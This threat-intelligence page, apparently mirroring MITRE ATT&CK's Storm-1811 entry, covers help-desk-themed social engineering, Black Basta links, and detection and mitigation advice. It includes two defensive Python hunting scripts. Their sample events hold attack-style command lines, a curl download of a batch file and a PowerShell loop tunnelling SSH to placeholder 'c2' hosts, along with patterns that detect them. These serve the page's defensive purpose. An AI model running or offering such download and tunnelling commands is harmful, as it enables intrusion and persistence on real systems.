G1046: Storm-1811
Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities.[1][2][3][4]
Analyst context for executives and security teams
Storm-1811 matters because ATT&CK describes it as a financially motivated group linked to Black Basta ransomware deployment and notable for social engineering that can look like normal help desk activity: inbox flooding followed by a fake support interaction and use of remote assistance tooling. For leaders, the key issue is not just phishing prevention; it is whether employees, service desks, identity teams, and the SOC can recognize and contain a support-themed intrusion before it becomes remote control, lateral movement, data staging/exfiltration, or ransomware deployment.
Executive priority
Prioritize validation of help desk procedures, remote support tool governance, privileged access monitoring, and ransomware response readiness. This activity threatens business continuity because the supplied ATT&CK relationships include Black Basta ransomware, Quick Assist, remote desktop software, SMB/SSH lateral movement, data staging, exfiltration, and common administrative tools such as PsExec, BITSAdmin, Impacket, PowerShell, and the Windows command shell. Executives should ask who is allowed to initiate remote assistance, how users verify support requests, whether remote admin tools are inventoried and logged, and whether IR playbooks connect social engineering reports to endpoint, identity, and network containment actions.
Technical view
ATT&CK provides no official detection text for Storm-1811, so defenders should build coverage from the documented relationships. Validate detections for unusual remote assistance sessions, especially Quick Assist or other remote desktop software following user-reported email flooding or help desk contact. On Windows, review telemetry for PowerShell, cmd, PsExec, BITSAdmin, SMB admin share activity, domain account discovery, user discovery, local data staging, encoded/encrypted files, deobfuscation, masquerading, and tool transfer. Where ESXi, Linux, or macOS are in scope, validate SSH activity, remote access, staging, and exfiltration monitoring aligned to the related techniques. IR teams should treat confirmed unauthorized remote support sessions as potential hands-on-keyboard access and rapidly scope identity use, lateral movement, staged data, and ransomware precursors.
Likely telemetry
- User reports and mail telemetry showing abnormal inbox flooding or high-volume non-malicious spam preceding help desk contact
- Help desk tickets, chat/phone records, and user verification logs related to remote assistance requests
- Endpoint process creation for PowerShell, cmd, PsExec, BITSAdmin, remote support tools, and renamed or oddly located executables
- Quick Assist and other remote desktop software execution, installation, session, or network connection logs where available
- Windows authentication, SMB/admin share access, service creation, and lateral movement evidence
Detection direction
- Correlate social signals with technical events: email bombing plus remote assistance use plus new process execution is more meaningful than any single event alone.
- Baseline legitimate Quick Assist and remote desktop software use; alert on unexpected initiators, unusual timing, first-time use, or sessions involving privileged users or sensitive systems.
- Tune administrative-tool detections carefully because PsExec, BITSAdmin, PowerShell, cmd, Impacket-like behavior, SMB, and SSH can be legitimate; prioritize context such as source host, account privilege, destination criticality, and sequence of activity.
- Look for post-access chains: remote support session followed by discovery, tool transfer, masquerading, encoded files, data staging, exfiltration, or lateral movement.
- Validate visibility gaps around help desk workflows, unmanaged remote support tools, ESXi hosts, SSH-enabled systems, and encrypted outbound traffic that is not part of approved business operations.
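The correlation the detection direction calls for (inbox flooding, then a remote assistance session, then administrative tooling on the same user's host) can be expressed as a small stateful rule. The block below is an added example for this page, not MITRE or Glexia code; its events are constructed, and the field names (kind, ts, user, host, image, inbound_count) and the executable names in REMOTE_ASSIST are assumptions. It deliberately does not alert on a flood alone or on a Quick Assist session alone, which is the "more meaningful than any single event" point above.

```python
"""Correlate the help-desk-themed intrusion chain described above.

Added example for this page; it is not MITRE or Glexia code. The events below are
constructed, and the field names (kind, ts, user, host, image, inbound_count) plus the
executable names in REMOTE_ASSIST are assumptions for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Remote assistance tools named on the page; image names are assumed for the example.
REMOTE_ASSIST = {"quickassist.exe", "anydesk.exe"}
# Administrative utilities and shells the page lists as follow-on activity.
ADMIN_TOOLS = {"powershell.exe", "cmd.exe", "psexec.exe", "bitsadmin.exe", "curl.exe"}

# Constructed telemetry: hourly inbound mail counts plus process-creation events.
SAMPLE_EVENTS = [
    # alice: flooded inbox, Quick Assist session 40 minutes later, then cmd.exe and curl.exe
    {"kind": "mail", "ts": "2025-01-15T09:00:00", "user": "alice", "inbound_count": 450},
    {"kind": "process", "ts": "2025-01-15T09:40:00", "user": "alice", "host": "WS-17", "image": "QuickAssist.exe"},
    {"kind": "process", "ts": "2025-01-15T09:52:00", "user": "alice", "host": "WS-17", "image": "cmd.exe"},
    {"kind": "process", "ts": "2025-01-15T09:55:00", "user": "alice", "host": "WS-17", "image": "curl.exe"},
    # bob: normal mail volume, then a Quick Assist session with no admin tooling (legitimate support)
    {"kind": "mail", "ts": "2025-01-15T10:00:00", "user": "bob", "inbound_count": 14},
    {"kind": "process", "ts": "2025-01-15T11:00:00", "user": "bob", "host": "WS-03", "image": "QuickAssist.exe"},
    # carol: flooded inbox but no remote assistance session inside the window
    {"kind": "mail", "ts": "2025-01-15T13:00:00", "user": "carol", "inbound_count": 620},
    {"kind": "process", "ts": "2025-01-15T13:10:00", "user": "carol", "host": "WS-22", "image": "cmd.exe"},
]


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def correlate(events, baseline_per_hour=20, flood_factor=10, window=timedelta(hours=2)):
    """Return one alert per (user, flood) where a remote assistance tool started within
    `window` of an inbox flood. score 2 = flood + remote assistance; score 3 = admin
    tooling also ran after the session began. A flood with no session is not alerted."""
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)

    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=_ts)
        floods = [e for e in evs if e["kind"] == "mail"
                  and e["inbound_count"] >= baseline_per_hour * flood_factor]
        for flood in floods:
            t0 = _ts(flood)
            later = [e for e in evs if e["kind"] == "process" and t0 <= _ts(e) <= t0 + window]
            assist = [e for e in later if e["image"].lower() in REMOTE_ASSIST]
            if not assist:
                continue  # flood alone: route to the user-report / help desk check, not the SOC queue
            t1 = _ts(assist[0])
            follow_on = [e["image"] for e in later
                         if e["image"].lower() in ADMIN_TOOLS and _ts(e) >= t1]
            alerts.append({
                "user": user,
                "host": assist[0]["host"],
                "flood_count": flood["inbound_count"],
                "remote_tool": assist[0]["image"],
                "follow_on": follow_on,
                "score": 3 if follow_on else 2,
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

In practice the mail-count baseline should come from per-user history rather than a fixed constant, and the window should be tuned to how quickly your help desk actually responds; the structure (flood, then session, then tooling, all keyed on the same user) is what carries the signal.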
Mitigation priorities
- Harden support workflows first: require strong user verification, prohibit unsolicited remote assistance, and train users to report inbox flooding and unexpected help desk contact.
- Govern remote assistance and remote desktop software: define approved tools, restrict who may initiate sessions, and log usage centrally where feasible.
- Strengthen identity controls for privileged and support accounts, including least privilege and review of accounts that mimic legitimate names or resources.
- Improve endpoint and server monitoring for administrative utilities, scripting shells, tool transfer, masquerading, staging, and lateral movement over SMB or SSH.
- Prepare ransomware response around the Black Basta relationship: confirm backup resilience, segmentation, critical asset isolation, and containment procedures for Windows and ESXi assets where present.
Analyst notes and limits
The supplied ATT&CK object identifies Storm-1811 as financially motivated and linked to Black Basta ransomware deployment, with social engineering involving email inbox flooding and fake help desk interaction. The strongest defensive value comes from connecting human-process telemetry with endpoint, identity, remote access, and network evidence. Relationship context materially expands what teams should validate, especially Quick Assist, remote desktop software, administrative utilities, lateral movement, discovery, staging, exfiltration, and ransomware-related readiness.
Platforms and tactics are not specified on the Storm-1811 group object, and official detection content is not provided. Platform references in this take come only from related software and technique objects, not from a group-level platform declaration. Local validation is required to determine whether Quick Assist, remote desktop software, SMB, SSH, ESXi, Linux, macOS, or specific administrative tools are present and monitored in the reader’s environment.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1585.003 | Cloud Accounts (sub-technique) | Storm-1811 has created malicious accounts to enable activity via Microsoft Teams, typically spoofing various IT support and helpdesk themes. [1] |
| Enterprise | T1074.001 | Local Data Staging (sub-technique) | Storm-1811 has locally staged captured credentials for subsequent manual exfiltration. [2] |
| Enterprise | T1667 | Email Bombing | Storm-1811 has deployed large volumes of non-malicious email spam to victims in order to prompt follow-on interactions with the threat actor posing as IT support or helpdesk to resolve the problem. [2][3] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder (sub-technique) | Storm-1811 has created Windows Registry Run keys that execute various batch scripts to establish persistence on victim devices. [2] |
| Enterprise | T1583.001 | Domains (sub-technique) | Storm-1811 has created domains for use with RMM tools. [2] |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location (sub-technique) | Storm-1811 has disguised Cobalt Strike installers as a malicious DLL masquerading as part of a legitimate 7zip installation package. [2] |
| Enterprise | T1588.002 | Tool (sub-technique) | Storm-1811 acquired various legitimate and malicious tools, such as RMM software and commodity malware packages, for operations. [1][2] |
| Enterprise | T1219.002 | Remote Desktop Software (sub-technique) | Storm-1811 has abused multiple types of legitimate remote access software and tools, such as ScreenConnect, NetSupport Manager, and AnyDesk. [1][2] |
| Enterprise | T1059.001 | PowerShell (sub-technique) | Storm-1811 has used PowerShell for multiple purposes, such as PowerShell scripts executing in an infinite loop to create an SSH connection to a command and control server. [2] |
| Enterprise | T1059.003 | Windows Command Shell (sub-technique) | Storm-1811 has used multiple batch scripts during initial access and subsequent actions on victim machines. [1][2] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Storm-1811 has distributed password-protected archives such as ZIP files during intrusions. [2] |
| Enterprise | T1036.010 | Masquerade Account Name (sub-technique) | Storm-1811 has created Microsoft Teams accounts that spoof IT support and helpdesk members for use in application and voice phishing. [1] |
| Enterprise | T1056 | Input Capture | Storm-1811 has used a PowerShell script to capture user credentials after prompting a user to authenticate to run a malicious script masquerading as a legitimate update item. [2] |
| Enterprise | T1574.001 | DLL (sub-technique) | Storm-1811 has deployed a malicious DLL (7z.DLL) that is sideloaded by a modified, legitimate installer (7zG.exe) when that installer is executed with an additional command line parameter of `b` at runtime to load a Cobalt Strike beacon payload. [2] |
| Enterprise | T1204.002 | Malicious File (sub-technique) | Storm-1811 has prompted users to execute downloaded software and payloads as the result of social engineering activity. [1][2][3] |
| Enterprise | T1566.004 | Spearphishing Voice (sub-technique) | Storm-1811 has initiated voice calls with victims posing as IT support to prompt users to download and execute scripts and other tools for initial access. [1][2][3] |
| Enterprise | T1027.013 | Encrypted/Encoded File (sub-technique) | Storm-1811 XOR encodes a Cobalt Strike installation payload in a DLL file that is decoded with a hardcoded key when called by a legitimate 7zip installation process. [2] |
| Enterprise | T1684.001 | Impersonation (sub-technique) | Storm-1811 impersonates help desk and IT support personnel for phishing and social engineering purposes during initial access to victim environments. [1] |
| Enterprise | T1105 | Ingress Tool Transfer | Storm-1811 has used scripted `cURL` commands, BITSAdmin, and other mechanisms to retrieve follow-on batch scripts and tools for execution on victim devices. [1][2][4] |
| Enterprise | T1570 | Lateral Tool Transfer | Storm-1811 has used the Impacket toolset to move and remotely execute payloads on other hosts in victim networks. [2] |
| Enterprise | T1021.004 | SSH (sub-technique) | Storm-1811 has used OpenSSH to establish an SSH tunnel to victims for persistent access. [1] |
| Enterprise | T1486 | Data Encrypted for Impact | Storm-1811 is a financially-motivated entity linked to the deployment of Black Basta ransomware in victim environments. [1] |
| Enterprise | T1036 | Masquerading | Storm-1811 has prompted users to download and execute batch scripts that masquerade as legitimate update files during initial access and social engineering operations. [2] |
| Enterprise | T1482 | Domain Trust Discovery | Storm-1811 has enumerated domain accounts and access during intrusions. [1] |
| Enterprise | T1566.003 | Spearphishing via Service (sub-technique) | Storm-1811 has used Microsoft Teams to send messages and initiate voice calls to victims posing as IT support personnel. [1] |
| Enterprise | T1566.002 | Spearphishing Link (sub-technique) | Storm-1811 has distributed malicious links to victims that redirect to EvilProxy-based phishing sites to harvest credentials. [1] |
| Enterprise | T1087.002 | Domain Account (sub-technique) | Storm-1811 has performed domain account enumeration during intrusions. [1] |
| Enterprise | T1033 | System Owner/User Discovery | Storm-1811 has used `whoami.exe` to determine if the active user on a compromised system is an administrator. [2] |
| Enterprise | T1048.002 | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol (sub-technique) | Storm-1811 has exfiltrated captured user credentials via Secure Copy Protocol (SCP). [2] |
| Enterprise | T1222.001 | Windows Permissions (sub-technique) | Storm-1811 has used `cacls.exe` via batch script to modify file and directory permissions in victim environments. [2] |
| Enterprise | T1021.002 | SMB/Windows Admin Shares (sub-technique) | Storm-1811 has attempted to move laterally in victim environments via SMB using Impacket. [2] |
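Several rows in the table describe host-level behavior specific enough to turn into hunting rules keyed by technique ID: the `7zG.exe` installer run with the extra `b` argument (T1574.001), `whoami.exe` and `cacls.exe` driven from batch scripts (T1033, T1222.001), cURL/BITSAdmin downloads (T1105), a PowerShell loop around an SSH connection (T1059.001), and Run keys that launch batch files (T1547.001). The block below is an added example for this page, not MITRE, Glexia, Rapid7 or Microsoft code; its events are constructed, Sysmon-like records, every field name (event, image, parent, cmdline, parent_cmdline, key, value) is an assumption, and hosts and URLs use the reserved `.invalid` domain as placeholders. Two benign controls (a normal 7-Zip extraction and an interactive `whoami`) show the rules staying quiet.

```python
"""Technique-keyed hunting rules for the behaviors in the Storm-1811 technique table.

Added example for this page; it is not MITRE, Glexia, Rapid7 or Microsoft code. Events are
constructed, Sysmon-like records and every field name (event, image, parent, cmdline,
parent_cmdline, key, value) is an assumption for this example. Hosts and URLs use the
reserved .invalid domain as placeholders.
"""
import re


def _base(path):
    """Lower-cased file name from a Windows path, or '' when absent."""
    return (path or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_techniques(e):
    """Return the technique IDs (from the table above) whose documented behavior the event matches."""
    hits = []
    img, parent = _base(e.get("image")), _base(e.get("parent"))
    cmd = e.get("cmdline", "")
    pcmd = (e.get("parent_cmdline") or "").lower()

    if e["event"] == "process":
        # T1574.001: the modified 7zG.exe installer is run with an extra `b` argument, which
        # triggers the 7z.DLL sideload. A lone trailing `b` is not a normal 7-Zip GUI invocation.
        if img == "7zg.exe" and re.search(r"\s+b\s*$", cmd):
            hits.append("T1574.001")
        # T1033: whoami.exe launched from a batch script (admin check before proceeding).
        if img == "whoami.exe" and ".bat" in pcmd:
            hits.append("T1033")
        # T1222.001: cacls.exe driven by a batch script rather than an interactive admin.
        if img == "cacls.exe" and parent == "cmd.exe" and ".bat" in pcmd:
            hits.append("T1222.001")
        # T1105: cURL or BITSAdmin pulling content from a URL.
        if img in {"curl.exe", "bitsadmin.exe"} and re.search(r"https?://", cmd, re.I):
            hits.append("T1105")
        # T1059.001: PowerShell looping over an ssh invocation (persistent tunnel attempt).
        if img == "powershell.exe" and re.search(r"while\s*\(", cmd, re.I) \
                and re.search(r"\bssh\b", cmd, re.I):
            hits.append("T1059.001")
    elif e["event"] == "registry":
        # T1547.001: a Run key whose value launches a batch script.
        key = (e.get("key") or "").lower()
        if "\\currentversion\\run" in key and (e.get("value") or "").lower().endswith(".bat"):
            hits.append("T1547.001")
    return hits


def hunt(events):
    """Count matches per technique ID across a batch of events."""
    counts = {}
    for e in events:
        for t in match_techniques(e):
            counts[t] = counts.get(t, 0) + 1
    return counts


# Constructed events; paths, names and hosts are placeholders, not indicators from the page.
SAMPLE_EVENTS = [
    {"event": "process", "image": r"C:\Users\u\Downloads\7zG.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Users\u\Downloads\7zG.exe" b'},
    {"event": "process", "image": r"C:\Windows\System32\whoami.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "whoami.exe", "parent_cmdline": r"cmd.exe /c C:\Users\u\update.bat"},
    {"event": "process", "image": r"C:\Windows\System32\cacls.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cacls.exe C:\ProgramData\stage /E /G user:F", "parent_cmdline": r"cmd.exe /c C:\Users\u\update.bat"},
    {"event": "process", "image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"curl.exe -o C:\ProgramData\stage.bat http://stage.example.invalid/stage.bat"},
    {"event": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'powershell.exe -c "while($true){ ssh ops@c2.example.invalid; Start-Sleep 30 }"'},
    {"event": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "Update",
     "value": r"C:\ProgramData\update.bat"},
    # Benign controls: a normal 7-Zip extraction and an interactive whoami.
    {"event": "process", "image": r"C:\Program Files\7-Zip\7zG.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\u\out" "C:\Users\u\a.7z"'},
    {"event": "process", "image": r"C:\Windows\System32\whoami.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "whoami", "parent_cmdline": '"C:\\Windows\\System32\\cmd.exe"'},
]

if __name__ == "__main__":
    print(hunt(SAMPLE_EVENTS))
```

The rules are intentionally narrow (batch-script parentage, the trailing `b`, a loop plus `ssh`) so that ordinary admin use of `whoami`, `cacls` and 7-Zip does not fire; the page's own caution about tuning administrative-tool detections applies, and the parent command line is the field that does most of the work here.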
Groups, software, and campaigns
S1070: Black Basta
Black Basta is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMware ESXi servers. Black Basta operations have included the double extortion technique where, in addition to demanding a ransom for decrypting the files of targeted organizations, the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. Black Basta affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the Black Basta RaaS operators could include current or former members of the Conti group.[1][2][3][4][5][6]
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S1209: Quick Assist
Quick Assist is a remote assistance tool primarily for Microsoft Windows, although a macOS version also exists. Quick Assist allows for remote screen sharing and, with end user approval, remote control and command execution on the enabling device.[1][2]
S0190: BITSAdmin
S0029: PsExec
S0357: Impacket
S0650: QakBot
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 29fa4e2a8110… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Microsoft Storm-1811 2024: Microsoft Threat Intelligence. (2024, May 15). Threat actors misusing Quick Assist in social engineering attacks leading to ransomware. Retrieved March 14, 2025.
- [2] rapid7-email-bombing: Tyler McGraw, Thomas Elkins, and Evan McCann. (2024, May 10). Ongoing Social Engineering Campaign Linked to Black Basta Ransomware Operators. Retrieved January 31, 2025.
- [3] RedCanary Storm-1811 2024: Red Canary Intelligence. (2024, December 2). Storm-1811 exploits RMM tools to drop Black Basta ransomware. Retrieved March 14, 2025.
- [4] RedCanary June Insights 2024: The Red Canary Team. (2024, June 20). Intelligence Insights: June 2024. Retrieved March 14, 2025.
- [5] mitre-attack G1046: MITRE ATT&CK group object G1046, Storm-1811.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.